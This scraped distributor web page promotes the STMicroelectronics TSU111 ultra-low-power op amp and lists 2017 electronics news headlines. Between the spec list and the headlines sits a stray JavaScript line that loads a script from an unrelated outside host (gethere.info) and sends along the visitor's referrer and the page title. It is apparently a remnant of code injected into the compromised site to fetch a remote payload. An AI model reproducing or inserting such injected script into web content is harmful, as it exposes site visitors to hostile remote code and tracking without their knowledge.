New brand and department NAVIA was incorporated in 2011 specially to manufacture state-of-the-art GPS/GLONASS/GALILEO receiver modules and embedded subsystems for the Russian and international market.
The PT AIR company is specializing in sale and delivery of the automatic systems for industrial application and railway service. The main delivery destinations are industrial computers, low voltage switching facilities, constructs, industrial ETHERNET, industrial sequence controls, couplings.
The main field of activities of company PT Technology are engineering and technology consulting of the full range: from development of the most effective total design-engineering solution to implementation of a developed solution into manufacturing. PT Technology offers consulting service in such areas as circuit technology, optimization and commonality of component database, selection of contract manufacturers.
STMicroelectronics introduces ultra low-power operational amplifier TSU111
The TSU111 STMicroelectronics operational amplifier (op amp) offers an ultra low-power consumption of 900 nA typical and 1.2 uA maximum when supplied by 3.3 V. Combined with a supply voltage range of 1.5 V to 5.5 V, these features allow the TSU111 to be efficiently supplied by a coin type Lithium battery or a regulated voltage in low-power applications. The high accuracy of 150 µV max and 11.5 kHz gain bandwidth make the TSU111 ideal for sensor signal conditioning, battery supplied, and portable applications.
- Submicro ampere current consumption: Icc = 900 nA typ at 25 °C
- Low offset voltage: 150 µV max at 25 °C, 235 µV max over
full temperature range (-40 to 85 °C)
- Low noise over 0.1 to 10 Hz bandwidth: 3.6 µVpp
- Low supply voltage: 1.5 V – 5.5 V
- Gain bandwidth product: 11.5 kHz typ
- Low input bias current: 10 pA max at 25 °C
- High tolerance to ESD: 4 kV HBM
s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;
- 14 Apr PT Electronics invites to visit our booth at the exhibition Expo Electronica 2017
- 30 Mar STMicroelectronics has made starting new designs with its popular 8-bit STM8 microcontrollers easier and faster by introducing the STM8CubeMX graphical configurator
- 24 Mar STMicroelectronics Launches Tiny 2.6A Brushed DC Motor Driver for Portable, Battery-Powered IoT Devices
- 20 Mar TIB Series DIN-Rail Power Supplies
- 16 Mar New Best-in-Class 900V MOSFETs from STMicroelectronics Enhance Power and Efficiency of Flyback Converters
- 11 Mar STMicroelectronics continues to enhance flexibility for developers working with high-performance STM32F722/723 microcontrollers
- 22 Feb Evaluation boards from STMicroelectronics for rapid and cost-effective development solutions for LoRaWAN™
- 9 Feb STMicroelectronics has extended its SLLIMM™ nano series of Intelligent Power Modules (IPMs)
- 31 Jan ST25 NFC/RFID Readers from STMicroelectronics
- 20 Jan TDN 1WI / 1WISM – miniature DC / DC-converters in two casing performances